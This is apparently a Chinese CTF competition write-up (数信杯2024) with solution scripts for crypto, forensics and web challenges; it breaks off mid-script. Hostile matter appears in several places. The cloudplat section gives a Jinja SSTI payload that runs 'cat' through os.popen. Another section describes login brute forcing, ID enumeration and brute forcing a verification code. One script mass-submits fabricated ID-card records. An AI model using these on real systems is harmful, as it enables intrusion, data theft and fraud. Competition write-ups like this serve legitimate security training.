数信杯2024初赛wp-yulin666

图片

西部赛区初赛第一名

定向数据采集

from faker import Faker 
def fak():
    """Return one synthetic resident ID number as a string.

    A new ``Faker`` instance bound to the ``zh-CN`` locale is created on
    every call, and the value comes from its ``ssn()`` provider.
    """
    generator = Faker(locale='zh-CN')
    id_number = generator.ssn()
    return id_number
def datagen():
    """Build one submission record around a freshly generated ID number.

    Sex and age are derived from the ID number so the record is internally
    consistent; every other field is a fixed filler value.
    """
    idcard = fak()
    # Second-to-last digit of the ID number: even -> female, odd -> male.
    sex = '女' if int(idcard[-2]) % 2 == 0 else '男'
    # Characters 7-10 (indices 6..9) are read as the birth year; the
    # reference year 2024 is hard-coded.
    birth_year = int(idcard[6:10])
    age = 2024 - birth_year
    return {
        "name": "我草",
        "sex": sex,
        "age": str(age),
        "ethnicity": "汉族",
        "idcard": idcard,
        "phonenumber": "12392911923",
        "address": "啊实打实大时代大萨达",
        "position": "阿达撒大声地",
        "experience": "12",
    }

import requests

# 设置请求头部
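# Request headers copied from a browser session. Content-Length is not pinned
# here: requests derives it from the JSON body, and each generated record has
# a different length, so a fixed '212' would only be misleading.
headers = {
    'Host': '121.40.65.125:23930',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36',
    'Content-Type': 'application/json;charset=UTF-8',
    'Accept': '*/*',
    'Origin': 'http://121.40.65.125:23930',
    'Referer': 'http://121.40.65.125:23930/',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close',
}

# Submit up to 1200 generated records and stop at the first response that
# contains the flag.
# NOTE(review): the service apparently accepts this many fabricated records
# from a single client; a production collection endpoint would need rate
# limiting and server-side validation of the submitted identity data.
for i in range(1200):
    data = datagen()
    try:
        # A timeout keeps one stalled connection from blocking the whole run.
        response = requests.post(
            'http://121.40.65.125:23930/submit',
            headers=headers,
            json=data,
            timeout=10,
        )
    except requests.RequestException as exc:
        print(f"request {i} failed: {exc}")
        continue
    if 'flag' in response.text:
        print(response.text)
        break
else:
    print("no response contained the flag")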

使用faker模块,等待浏览器弹出flag即可。

Cloudconsole

利用xray扫描

image-20240420195318549

打开xray,访问一会后发现自动登上后台了(弱口令爆破)。

image-20240420195343095

此时是测试账号,因此我们尝试访问账号界面ID=1,得到管理员手机号155666644。

img

对验证码进行爆破(1-9999),得到1234,访问后找到flag。从防守角度看,这条链路依次利用了弱口令、可遍历的账号ID(越权读取管理员手机号)以及显然没有有效尝试次数限制的4位验证码,三处都需要在服务端修复。

img

flag{Jih7RUPNQHcE6yEJxEXH}

Backpack

# 导入必要的SageMath库  
from sage.all import *

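# Challenge data: target sum S and the 31 public knapsack weights M.
S = 231282844744
M = [
    27811518167, 19889199464, 19122558731, 19966624823, 25670001067,
    30690729665, 23936341812, 31011714749, 30524482330, 21737374993,
    17530717152, 19140841231, 33846825616, 17334386491, 28867755886,
    29354544582, 21758322019, 27261411361, 31465376167, 26145493792,
    27075307455, 33514052206, 25397635665, 21970496142, 30801229475,
    22405695620, 18486900933, 27071880304, 17919853256, 18072328152,
    21108080920
]

n = len(M)
# Weight on the sum column so that reduced vectors prefer a zero there.
W = n

# Standard low-density subset-sum lattice, (n+1) x (n+1):
#   row i (i < n): 2 in column i, W*M[i] in the last column
#   row n        : 1 in every column, W*S in the last column
# The earlier n x (n+1) layout overwrote the last weight with S and had no
# row for S at all, so no reduced row could ever pass the -1/0/1 test.
A = Matrix(ZZ, n + 1, n + 1)
for i in range(n):
    A[i, i] = 2
    A[i, n] = W * M[i]
for j in range(n):
    A[n, j] = 1
A[n, n] = W * S

# Lattice basis reduction.
A_reduced = A.LLL()

# A solution row has 0 in the sum column and +/-1 everywhere else; the
# selection bits are (1 + v) / 2 or (1 - v) / 2 depending on the overall sign.
solution = None
for row in A_reduced.rows():
    if row[n] != 0 or any(abs(v) != 1 for v in row[:n]):
        continue
    for sign in (1, -1):
        bits = [(1 + sign * int(v)) // 2 for v in row[:n]]
        # Confirm the candidate against the original equation before use.
        if sum(weight for weight, bit in zip(M, bits) if bit) == S:
            solution = bits
            break
    if solution is not None:
        break

if solution is None:
    print("No solution found.")
else:
    print("Found solution:", solution)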

# 如果你需要将整数解转换为字节
def int_to_bytes(n):
    """Return the big-endian byte string of the non-negative integer *n*.

    The length is the minimum number of bytes that holds ``n``; zero maps to
    the empty byte string.
    """
    byte_count = (n.bit_length() + 7) // 8
    return n.to_bytes(byte_count, byteorder='big')

# 假设solution是一个整数列表,你可以这样转换
# solution_bytes = [int_to_bytes(x) for x in solution]

1

Backpack_revenge

阅读代码并多次交互后发现,secret的长度是固定的23;它用了三次背包加密,并给出了加密用的M和加密的结果。由于secret长度还是很小,只有23,于是想着继续用那个C++爆破脚本,把里面的dfs改一下就行

#include <bits/stdc++.h>
using namespace std;
typedef long long LL;
// Template constants; none of them is referenced by the code visible in this listing.
const LL maxn = 1e9+10,N=2*1e5+120,g=239,mod=1e9 + 7,cmod=998244353,INF=1e16;
// Not referenced by the visible code either (dfs has its own parameter k).
int n,m,k,q;
// 69 knapsack weights. dfs reads M[k], M[k+23] and M[k+46] for bit k, so the
// array is used as three consecutive groups of 23 weights.
LL M[]={685, 2019, 1262, 769, 630, 527, 1192, 1634, 1357, 661, 1164, 784, 2048, 2000, 1239, 1302, 1816, 1918, 1724, 1961, 1831, 1620, 732, 1756, 807, 875, 1940, 1095, 1702, 1514, 1651, 1206, 845, 869, 1638, 935, 1485, 1678, 1407, 696, 828, 841, 1058, 1167, 1478, 1582, 683, 1486, 1372, 1781, 671, 1564, 877, 565, 1519, 1449, 1773, 664, 1355, 1993, 843, 1332, 1943, 1931, 716, 635, 1863, 1271, 2019};
// Target sums, one per weight group, that dfs compares its three running sums against.
LL C[] = {11881, 11491, 11114};
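// Depth-first search over the 23 secret bits.
//   k            index of the bit being decided (0..22)
//   as1,as2,as3  running sums for the three weight groups M[0..22],
//                M[23..45] and M[46..68]
//   z            bits chosen so far, first bit most significant
// Prints every full 23-bit value whose three sums equal C[0], C[1], C[2].
// The earlier version also printed z whenever the sums matched at a
// shallower depth, which emitted truncated prefixes and duplicated the line
// at depth 23; only complete assignments are reported now.
void dfs(int k,LL as1,LL as2,LL as3,LL z)
{
    if(k==23)
    {
        if(as1==C[0]&&as2==C[1]&&as3==C[2])
            printf("%lld\n",z);
        return;
    }
    // Every weight in M is positive, so a sum already above its target
    // cannot come back down: prune the branch.
    if(as1>C[0]||as2>C[1]||as3>C[2]) return;

    // Bit k set: add the k-th weight of each group and append a 1 bit.
    dfs(k+1,as1+M[k],as2+M[k+23],as3+M[k+46],(z<<1)^1);
    // Bit k clear: sums unchanged, append a 0 bit.
    dfs(k+1,as1,as2,as3,(z<<1));
}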
int b[31];
// Entry point: start the search at bit 0 with all three sums and the
// accumulated value at zero.
int main()
{
    const int first_bit = 0;
    dfs(first_bit, 0, 0, 0, 0);
    return 0;
}

同时两次交互来解密secret后发现每次解密出的secret都一样,判断secret是个常数,于是直接交这个secret=5000268

以下是交互脚本

from pwn import *
# Connect to the challenge service, echo its four banner lines, submit the
# recovered secret and print the reply.
conn = remote('121.40.65.125', 29514)
for _ in range(4):
    print(conn.recvline())
conn.sendline(b'5000268')
print(conn.recvline())

结果为

flag{U9VFwHBY3tk46wM4zKav}

好小的公钥

看代码发现e很小,并且n未给出任何分解相关的有效信息,于是直接去factordb网站上查询n,失败了。再然后发现c1、c2对应的m1、m2只有name有区别,且程序中给出了name的长度20,于是m1、m2只有连续160个比特会有区别。开始时试图分解出name1和name2,失败了。

于是转换思路试图求解出name1-name2,首先由于不知道name的具体所在位置,所以要爆破枚举name的所在位置。然后列出两个c1和c2的方程,

用结式(resultant)消元法消去y,转变为x的单变量方程。由于x是一个160比特大小的数,且分析发现x的最高次是9,可以用铜匠(Coppersmith)攻击求解出方程的小根

直接调用small_roots方法求解出name1-name2

# The byte offset of the 20-byte name inside the message is unknown, so try
# every offset i. x stands for the difference of the two names and y for the
# message that encrypts to c1.
for i in range(3, 512):
    shift = 2^(i*8)
    f = (x*shift + y)^3 - c2
    g = y^3 - c1
    # The determinant of the Sylvester matrix is the resultant of f and g
    # with respect to y: a polynomial in x alone.
    h = f.sylvester_matrix(g, y).det().univariate_polynomial().monic()
    print(i)
    # x is at most 160 bits, which is the bound handed to small_roots.
    roots = h.small_roots(X=2^(160), beta=0.5)
    if roots:
        print(roots)

之后观察到f、g这两个方程是存在公共根的,于是对这两个方程求gcd,再把得到的多项式化成y-C的形式(C是一个常数)

再转换C为bytes得到结果

# With the name difference cs1 and the byte offset ilen fixed, f and g are
# both polynomials in y that share the unknown message as a root.
f = (cs1*(2^(ilen*8)) + y)^3 - c2
g = y^3 - c1


def gcd(ux, uy):
    """Euclidean algorithm: return the last non-zero remainder of ux and uy."""
    while uy:
        remainder = ux % uy
        ux, uy = uy, remainder
    return ux


print(gcd(f, g))

以下是完整代码

n = 568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136139831000566777869918466156880089327163065068626898059287985228258082737620000000279896747890757319085381631511173307825511583906098352616444664784639501033857651875619579526808372015544289449630825737736069734585631737164678002506101904757713885951128904172308749831239593270099962357714449828976184968093339746550743879291082640824342416614313080244013521184173978725567256679980140028608635479169401328634544278604752913220323603960576165670347499629983898810503372179588691930448790663301146315112753895278701851939171098189289426351907555872008321093595413542315030724511959094814066961512647863851936300847205610378379468461090776667809852896300095279643331141021965338494497059637030460612114103972724295296066218378878321083520263808122442805624484709678389194358767917969953786151907151113054612259390820206281236656103050308732275671876578046759831954611695137121364671140004360818977230200260012108474639126819289473259618493019534134103467249869746345593299925296296576270840411168887985994517056879751144774547
c1 = 431312103100767688301270873515694180462257583459908234203073002487325117493887047120595913906904515450437699824150951431203682143625472233283131484154340726407655916093919153094880725587387190657282541339852240866740558210935057304045622134333737364837907803284500720912477083278604674191761558055606257265613653371174413735704743368774112560256371957440166273363312892826954931938520339749763587237647531487364315671724711104121476132976721311150162435461040429472367051903062023684424445453470509770755251625919328562598684973145845411949679521293696654238536568271288227873235222254418381637988720403134737388969117301315129764877084098263887038702360875806169943329250942423481218879414262975949372263342542267307509991818876001663343080174068122745544889250468768262778036531643485618966462765400799197337845903384752263868544685704850009883890733780492467688079391036667616844591782969089061420721690202569906456519442030878032969214680094553153977362452465792210460969237703808838958554390073039156314586976508524382532218487645573442266610936598298297875467628751249793552304509948574237292979527475347029486469806949152294324189679630412632233400760461994879210062157065072372411916571806421837168282993333259037632027802003
c2 = 111326641811759493604088523562272731454464716671194755315328363821292903187271753249420574406026395878690499347562021194039381824656168455890425774471881313917884834279782521293520897666098947728412358720613339825800136298612478019319813893005212230183582102418424882679301752156049958975894273766026631862041748967780800417583410741108884715313323900093310792257441808867208196444135018606731846323195653209862566605010692791815067942002776912439607453059083583034027686629599715307795110352640886758030641410333262371457801139341561118922116406804672110476329045310692884716196591553487627768331568194031497995162292372362355335942016715203357198021060493558898566979718960008685572625090545387509936034791555171957700118277390090007172285832465740027830724861313089424939667978089316596191454429096123617934705475390965480354286330548814947931157769714442311818706252505465905591041180883235830012150614876110315563201395578841723561829534311600512174988418799061640259280069741788731955575782711935172179986077118656212700160367567297188194157963591548015377609501024174395290161373145148594887695593674066706818905384618972001711737840675693775981586009982344466167108444473750394255025928855839837371545436570899099865485704861
# Polynomial ring in x and y over the integers modulo n.
P.< x, y > = PolynomialRing(Zmod(n))
x, y = P.gens()
# f1 and f2 are only used by the two commented-out lines below.
f1=(x+y)^3
f2=(y)^3
#c1=f1(2^170,2^1024+1)
#c2=f2(0,2^1024+1)
print(2^170)
cs=568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136139831000566777869918466156880089327163065068626898059287985228258082737620000000279896747890757319085381631511173307825511583906098352616444664784639501033857651875619579526808372015544289449630825737736069734585631737164678002506101904757713885951128904172308749831239593270099962357714449828976184968093339746550743879291082640824342416614313080244013521184173978725567256679980140028608635479169401328634544278604752913220323603960576165670347499629983898810503372179588691930448790663301146315112753895278701851939171098189289426351907555872008321093595413542315030724511959094814066961512647863851936300847205610378379468461090776667809852896300095279643331141021965338494497059637030460612114103972724295296066218378878321083520263808122442805624484709678389194358767917969953786151907151113054612259390820206281236656103050308732275671876578046759831954611695137121364671140004360818977230200260012108474639126819289473259618493019534134103467249869746345593299925296274073696996381973296121109312481072817280748704
# cs1 takes the place of x, and ilen the place of the loop index i, in the f
# that is built after this block; presumably they are the root and offset
# reported by the search below when it was run -- confirm.
cs1=22502573844029195591864885204575806933864025843
ilen=401
# The search loop is kept inside a string literal, so it is not executed.
'''
for i in range(3,512):
f = (x*(2^(i*8))+y)^3-c2
g = (y)^3-c1
h = f.sylvester_matrix(g, y).det().univariate_polynomial().monic()
#print(h)
print(i)
roots=h.small_roots(X=2^(160),beta=0.5)
if len(roots)!=0:
print(roots)
'''

# With the name difference cs1 and the byte offset ilen fixed, f and g are
# both polynomials in y that share the unknown message as a root.
f = (cs1*(2^(ilen*8)) + y)^3 - c2
g = y^3 - c1


def gcd(ux, uy):
    """Euclidean algorithm: return the last non-zero remainder of ux and uy."""
    while uy:
        remainder = ux % uy
        ux, uy = uy, remainder
    return ux


print(gcd(f, g))
xs=75912276473669370492298543347489880882773184257255675346190757278499807262137750152580304830223847787218142856869420597971534775471907679278040934206557685373184266313381208309068838212838502311538830720988831533214248668824198103758646468141425377684473018941153132570437817730031044736601406029756057895378290209666927514287545305811245434020201363496043921922552321321126173021212450829031458685397581502464841897657009193822066907904684339567048411893205561557592977890167095203746880001363613413161762486225378900275078831684881550125418710637157317902134382771991649241897758050208635097455945624610479238760215459249788713237230939641234367985660885344708381298766463738210528110849089495838322027724918453000449420935494688171096708547375568470761643778949127956491347135215910114064088683866498270442573042009097594149341693488160937694041585415781751211830583548152317931753421463175521121102522187877611512662866409081438494276393480651283300762883391326604411207285122908490316872263401272946127097988275496547977580302678315505248789471022905739897255329480907640672240470969826076822070363607205528100519325442252558602480189485785203746417911685302044470866623664245347676765090437304521368252757713621825087005564745*y + 
249232217447088470017517108532603127647764257231000945606085312343234346642887365573442281891869769573193103809755295005726512948757236723602454366353511322552078203027626328672305530936471332104632068874639021398521141789822008410100566592052144344486764112549833834277894475216405534618656813055976695234344939793969826767235805703568281467044597504160229853401409155512262288680012947215577931092260083233508796579091976557540249899478018883690697564923485431460667780393001915193375256503503266661591463436753250455175675443472187207664310828013636954735651610659845300464092447549538010651864118369569643385989028285347684532913171184569598522190650832934939889916673796900283686359627961384997454512932208052324830350287129526552464117306919240730692089198552066151648221281139803059921708054245746722477829012007595944346291809326829061589655388120563852888555191506731646365114387914597282226318925565157964489075260040098871199811850010522652705956032546776166705080580225160655649392437968020952027410597067308517954169176021203342485946036066103258811091183560926704740999740310353512576181269562376008687822036728706979881848612778922653363446106218734485474774034508565328665848013661791639232681913537490241624318983744


cm=75912276473669370492298543347489880882773184257255675346190757278499807262137750152580304830223847787218142856869420597971534775471907679278040934206557685373184266313381208309068838212838502311538830720988831533214248668824198103758646468141425377684473018941153132570437817730031044736601406029756057895378290209666927514287545305811245434020201363496043921922552321321126173021212450829031458685397581502464841897657009193822066907904684339567048411893205561557592977890167095203746880001363613413161762486225378900275078831684881550125418710637157317902134382771991649241897758050208635097455945624610479238760215459249788713237230939641234367985660885344708381298766463738210528110849089495838322027724918453000449420935494688171096708547375568470761643778949127956491347135215910114064088683866498270442573042009097594149341693488160937694041585415781751211830583548152317931753421463175521121102522187877611512662866409081438494276393480651283300762883391326604411207285122908490316872263401272946127097988275496547977580302678315505248789471022905739897255329480907640672240470969826076822070363607205528100519325442252558602480189485785203746417911685302044470866623664245347676765090437304521368252757713621825087005564745
import gmpy2 as gp
# Multiply by the inverse of cm modulo n. cm appears to be the coefficient of
# y in the printed gcd, so this normalises the linear polynomial to the form
# y + C -- confirm against the gcd output.
xs*=inverse_mod(cm,n)
print(xs)
xs2=568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136136320995282543074035456056821931776470915459802161035016774910328986323340064723823601358191192724326897349341597000502102018631267199460843264681292311278559465587545719505802671193017964123780363464984077169577833257842589087942545276588392897000332340550822498650429085280357344996478980952876619349606741147197410253135312645035706822347924220099206191876612630068512879551466747348560267800605986697904702251260531364811486554500270930656471997860752246468793935111330200606840355795453673113970438981705435468450471884398372219505972709294983913670835986800227446394410918642907986850955958428639639813925170880382756290935355535155879203798768953032780036589159992638959383219122749581355954232065366797744698220209644443749723244099427237525488376104293995954432591882841220426836527029117318470886992558897709256375615937928900838071657874723813335223008696832349205866902136097335625642357536470120937486648558982174937790178247148170436277149203031706385440784727319730858994878198282598771650570593052976558642
# Decode both xs2 and n - xs2 as bytes; presumably one of the two is the
# message, depending on the sign of the constant term -- confirm.
# NOTE(review): long_to_bytes is not imported anywhere in the visible listing.
print(long_to_bytes(int(xs2)))
print(long_to_bytes(int(n-xs2)))
print('ok')
1
flag{oirh398ryhw9iufs3}

Prime Conundrum

题中很明显存在多个小量s,t,delta,考虑格攻击

有等式

sP+tQ+delta+k*n=leak

题目给出P,Q, n, leak,分析s,t,delta,k都是一个小量,于是直接造格,来获取。

有以下关系,同时在最后一列配上大系数X,保证规约出0

代码如下

P = 91307300383014465303389363075431698588933838431961163766796972428733255940234665671679789435258337578396879726483195947952476118985507696067550566875810703327064257916213956673893327976728584687137639337961422903593701591152074826447530099276756806166361533554689114264018344629905535188048343259754284652017
Q = 149089411480331249267443825847904508235946280550542428853480950085018092182435890098430254117786823782088885695848943795846175490059759543848516828825072642481794902650586147465149175976488985613001468444893241645390860978312924241181340390543064512602477917112031391367608345501790785857442379515898677467337
n = 97339579366356507946846401691835843338581994635020856947574389213640653953117584127557153363761256108433474475102197685296591968229050609482457622390855692102761025647645801250282912327521623082583744902369819132264725498938021235699466656447009532567358416017236962637028458839659218745744825556065623673913
N = 72077628115206161977315177371814064093288033362281459918751639032623658967593542855291047617938064177930014574391486973767462937337649946356572406647109942552336519343063401327708412361664750917582404375485334706345485264831286788789648126355202140531434534406410829696252616051882952860015344370516517084357909896281965899571934196572691
leak = 45439323369250400352006541741265096780554398472451037280607564706700682873365442581062404781075514235328183754475227917775810587457541607767765455164339314322631781126065808432845447798024685402323868389611285038950397054020330610558058133599416135943335731904873776868614834960217751934513462319743149481906
c = 31456530156035981140909630437789986968079386074106871160743980387785993275753486380185420818239283975922682050323918081691381897642776414263991442096807392948925867761878299044300335666219533277719472330029607869735373712681522022301659090108633692457216985013550482473362675907949633024047291607542103649091410575340884845190483766424507
hint = 13318665442465244206832303588726230530847297247590371628366697082014350966833522479782161994817212671730145702818662148370306660550486536176566012104254910
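# Lattice for the relation s*P + t*Q + delta + k*n - leak = 0.
# Rows 0..3 carry an identity part (one unknown each) plus that unknown's
# coefficient, scaled by X, in the last column; row 4 carries -leak*X.
# The large factor X forces reduced vectors to have 0 in the last column,
# leaving (s, t, delta, k) in the first four entries.
X = 2^1024
mar = matrix(ZZ, 5, 5)
for i in range(4):
    mar[i, i] = 1
mar[0, 4] = P*X
mar[1, 4] = Q*X
mar[2, 4] = 1*X
mar[3, 4] = n*X
mar[4, 4] = -leak*X

# Reduce once and reuse the result; the reduction used to be run twice.
shortest = mar.LLL()[0]
print(shortest)
# NOTE(review): LLL may return the negated vector, in which case every entry
# here has the opposite sign; the p*q == n print below is the sanity check.
s, t, delta, k, z = shortest
p = hint + s
q = n // p
print(p*q == n)
e = 65537
# Treats delta as a third prime factor next to p and q -- presumably
# N = p*q*delta; confirm against the challenge source.
phi = (p-1)*(q-1)*(delta-1)
d = inverse(e, phi)
m = pow(c, d, N)
print(long_to_bytes(int(m)))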
1
flag{499959682502a9ee664412774d995c85}

消逝的曲线

本题就是给了四个点。于是有四个在模p中的方程,椭圆曲线方程 y^2=x^3+a*x+b

有四个方程

$y1^2=x1^3 +a*x1+b \quad(mod\quad p)$

$y2^2=x2^3 +a*x2+b\quad (mod \quad p)$

$y3^2=x3^3 +a*x3+b\quad (mod\quad p)$

$y4^2=x4^3 +a*x4+b\quad (mod\quad p)$

消除b的影响,有三个方程

$y1^2 - y2^2=x1^3 -x2^3+a*(x1-x2) \quad(mod\quad p)$

$y2^2 - y3^2=x2^3 -x3^3+a*(x2-x3)\quad (mod\quad p)$

$y3^2 - y4^2=x3^3 -x4^3+a*(x3-x4)\quad (mod\quad p)$

再消除a的影响,有两个方程

$(x2-x3)(y1^2-y2^2)-(x2-x3)(x1^3-x2^3)-(x1-x2)((y2^2-y3^2)-(x2^3-x3^3))=0 \quad(mod\quad p)$

$(x2-x3)(y3^2-y4^2)-(x2-x3)(x3^3-x4^3)-(x3-x4)((y2^2-y3^2)-(x2^3-x3^3))=0\quad(mod\quad p)$

代入求值,再gcd得到kp,再扔进yafu里分解得到p

然后列出原始四个方程,用groebner解出a,b

最后flag的形式应为flag='flag{' + hashlib.sha256(str( (a+b+p)%p ).encode()).hexdigest() +'}'

代码如下

# Four known points (x_i, y_i) on the unknown curve y^2 = x^3 + a*x + b (mod p).
x1,y1=326672433563808078860194887521653547089556740597 , 184497841037716044508112339838233572527979342579
x2,y2=946940648888016429117035739241938283924071224831 , 321676290528200789029428639046110268747006565356
x3,y3=466606422274774582389917703171293585058211734594 , 1074845338842713759215696692888593660449409944456
x4,y4=800969026528232354813204405831803185648593796532 ,716443765574481260039522236141448382825732855234
# Integer expressions with a and b eliminated; both are multiples of p, so
# their gcd is a multiple k*p of the modulus.
f1=(x2-x3)*(y1^2-y2^2)-(x2-x3)*(x1^3-x2^3)-(x1-x2)*((y2^2-y3^2)-(x2^3-x3^3))
f2=(x2-x3)*(y3^2-y4^2)-(x2-x3)*(x3^3-x4^3)-(x3-x4)*((y2^2-y3^2)-(x2^3-x3^3))
print(gcd(f1,f2))
p=abs(gcd(f1,f2))
from Crypto.Util.number import isPrime
# p is overwritten with a hard-coded value; the next line checks that the
# gcd divided by 11 equals it, and the line after that it is prime.
p= 1147718459924575949776230905228771300694578329241
print(abs(gcd(f1,f2))//11==p)
print(isPrime(int(p)))
# The four curve equations as polynomials in a and b over Z/pZ.
F = []
PR.<a,b> = PolynomialRing(Zmod(p))
f=y1^2-(x1^3+a*x1+b)
F.append(f)
f=y2^2-(x2^3+a*x2+b)
F.append(f)
f=y3^2-(x3^3+a*x3+b)
F.append(f)
f=y4^2-(x4^3+a*x4+b)
F.append(f)
res = Ideal(F).groebner_basis()
print(res)
# a and b are hard-coded as p minus a constant; presumably the constants were
# read off the Groebner basis printed above -- confirm.
a=p-562057997528662832671979630483769294719057055570
b=p-767226941590139107595679281744178365913055475754
print(f'a={a}')
print(f'b={b}')
print(f'p={p}')
# Check the recovered parameters against points 1, 2 and 4 (point 3 is not checked).
print(y1^2%p==(x1^3+a*x1+b)%p)
print(y2^2%p==(x2^3+a*x2+b)%p)
print(y4^2%p==(x4^3+a*x4+b)%p)
import hashlib
print(int(a)+int(b)+int(p))
print((int(a)+int(b)+int(p))%p)
# NOTE(review): this hashes a+b+p without a % p reduction. The two prints
# that follow hash explicit literals that differ by exactly p, i.e. one
# candidate with the reduction and one without.
flag='flag{' + hashlib.sha256(str(int(a)+int(b)+int(p)).encode()).hexdigest() +'}'
print(flag)
print('flag{'+hashlib.sha256(str(int(966151980730349959284802898229594940757044127158)).encode()).hexdigest()+'}')
print('flag{'+hashlib.sha256(str(int(2113870440654925909061033803458366241451622456399)).encode()).hexdigest()+'}')

flag{b785a320839a4a51dc206d2ee72ebb2b9039dbed06b43c7c6164a3ce0151eb7b}

幻方

import hashlib
import itertools
from string import digits, ascii_letters, punctuation
from pwn import *
from z3 import Int, Solver

# pwntools debug logging: prints the data sent and received on the connection.
context.log_level = 'debug'

def sha(tail, sha256):
    """Solve the proof-of-work: find XXXX with sha256(XXXX + tail) == sha256.

    Candidates are every 4-character string over digits, ASCII letters and
    punctuation, tried in ``itertools.product`` order. Returns the first
    match as UTF-8 bytes, or ``b''`` when no candidate matches.
    """
    charset = digits + ascii_letters + punctuation
    for combo in itertools.product(charset, repeat=4):
        prefix = ''.join(combo)
        digest = hashlib.sha256((prefix + tail).encode('utf-8')).hexdigest()
        if digest == sha256:
            return prefix.encode('utf-8')
    return ''.encode('utf-8')

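def solve(arr):
    """Fill the 'X' cells of a 3x3 grid so that it becomes a magic square.

    Args:
        arr: three rows of three strings; each cell is a decimal number or
            'X' for an unknown. The list is modified in place.

    Returns:
        The completed grid as three space-separated lines, each ending in
        a newline.

    Raises:
        ValueError: if no assignment of the unknowns satisfies the constraints.
    """
    from z3 import sat  # the file-level import only brings in Int and Solver

    # Replace known cells by ints and unknown cells by z3 integer variables,
    # numbered in row-major order.
    unknowns = []
    for i in range(3):
        for j in range(3):
            if arr[i][j] == 'X':
                cell = Int(f'ans[{len(unknowns)}]')
                unknowns.append(cell)
                arr[i][j] = cell
            else:
                arr[i][j] = int(arr[i][j])

    rows = [arr[i][0] + arr[i][1] + arr[i][2] for i in range(3)]
    cols = [arr[0][j] + arr[1][j] + arr[2][j] for j in range(3)]
    diag_main = arr[0][0] + arr[1][1] + arr[2][2]
    diag_anti = arr[0][2] + arr[1][1] + arr[2][0]

    s = Solver()
    s.add(rows[0] == rows[1])
    s.add(rows[1] == rows[2])
    s.add(cols[0] == cols[1])
    s.add(cols[1] == cols[2])
    s.add(diag_main == diag_anti)
    # The diagonals must also equal the row sum; equal rows, equal columns
    # and two equal diagonals alone do not imply it.
    s.add(diag_main == rows[0])
    print(arr)

    # check() returns a result object that is truthy even for unsat, so it
    # has to be compared with sat explicitly.
    if s.check() != sat:
        raise ValueError("no assignment turns the grid into a magic square")

    m = s.model()
    pending = iter(unknowns)
    for i in range(3):
        for j in range(3):
            if isinstance(arr[i][j], int):
                continue
            # model_completion gives a value even to a variable the solver
            # left unconstrained.
            arr[i][j] = m.eval(next(pending), model_completion=True).as_long()

    print(arr)
    res = f"{arr[0][0]} {arr[0][1]} {arr[0][2]}\n{arr[1][0]} {arr[1][1]} {arr[1][2]}\n{arr[2][0]} {arr[2][1]} {arr[2][2]}\n"
    return res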

# Connect to the service and read the proof-of-work line, which has the form
# "[+] sha256(XXXX+<tail>) == <digest>".
r = remote('121.40.65.125', 29175)
pow_line = r.recvline().decode('utf-8')
pow_line = pow_line.replace('\n', '').replace('[+] sha256(XXXX+', '')
pow_parts = pow_line.split(') == ')
xxxx = sha(pow_parts[0], pow_parts[1])

r.recvuntil(b'[+] Plz tell me XXXX: ')
r.sendline(xxxx)

# Skip one line, then read the three rows of the grid as lists of tokens.
r.recvline()
arr = [
    r.recvline().decode('utf-8').replace('\n', '').split(' ')
    for _ in range(3)
]

# Complete the square and send it back, then hand the session to the user.
magic = solve(arr)
r.sendline(magic)

r.interactive()

2

MWatch

观察流量包发现是手环和手机的蓝牙流量,查看所有ATT协议,发现存在heart_rate_measurement关键词,直接过滤一下查看最大的即可。

# 过滤条件: btatt.heart_rate_measurement.value.8
# flag: Mi Smart Band 5_Redmi K40_128

4

cloudplat

app.py源码中泄露了登录用户名和密码,登录后存在SSTI模板注入。由于areaid字段的长度不能超过20,因此将payload拆开,利用config.update在config全局对象中分段保存payload。可见长度限制并不能阻止注入:config在请求之间保持状态,短片段可以逐步拼接;根本的修复是不把用户输入当作模板源码渲染(使用固定模板并以变量传值),同时不要在源码中硬编码口令。

{{config.update(u=lipsum.__globals__)}}
{{config.u.os.popen('cat /f*').read()}}

img

Baby_RSA

由于q的值并不大,因此可以通过枚举q来逆推出n,从而求解m

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# from secret import flag,init
from Crypto.Util.number import *
# from sage.all import *
from gmpy2 import *
# m = bytes_to_long(flag.encode())
# r = getPrime(128)

# p = init
# # for i in range(r-1):
# # p += next_prime(init)

# # assert iroot(p,3)[1] == 1
# q = getPrime(12)
# # N = p*q*r
# N = r**4*q
# e = getPrime(17)
# c = pow(m,e,N)
# print(f"r = {r}")
# print(f"e = {e}")
# print(f"c = {c}")


r = 287040188443069778047400125757341514899
e = 96001
c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625

# The commented-out challenge source builds N = r**4 * q with q = getPrime(12),
# so q is small enough to enumerate. For each prime candidate, rebuild the
# modulus, derive the private exponent and check whether the plaintext
# contains b'flag'.
for q in range(1000, 5000):
    if not isPrime(q):
        continue
    modulus = r**4 * q
    # Euler phi of r**4 * q for distinct primes r and q.
    phi = (r - 1) * r**3 * (q - 1)
    d = invert(e, phi)
    plaintext = long_to_bytes(pow(c, d, modulus))
    if b'flag' in plaintext:
        print(plaintext)
        exit(0)


# r = 287040188443069778047400125757341514899
# e = 96001
# c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625

img

fun

图片中给了x、y、z三个参数的限制条件,因此构建Z3表达式来求解所有可能的组合,得到随机数种子,从而计算KEY,反解被加密文件。

from z3 import *
from Crypto.Cipher import AES
import random

# 创建整数变量x, y, z
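# Symbolic 32-bit variables for the three parameters.
x, y, z = BitVecs('x y z', 32)

s = Solver()

# Constraints given by the challenge.
s.add(0 <= x, x <= 100)
s.add(0 <= y, y <= 100)
s.add(0 <= z, z <= 100)
s.add(x * y != z)
s.add(x ^ y == z)
s.add((x + y) * z == x * x + y * y)
s.add(x != y)

# Read the encrypted file once: 16-byte nonce, 16-byte tag, then ciphertext.
PATH = "encrypted_flag.bin"
with open(PATH, "rb") as file_in:
    nonce = file_in.read(16)
    tag = file_in.read(16)
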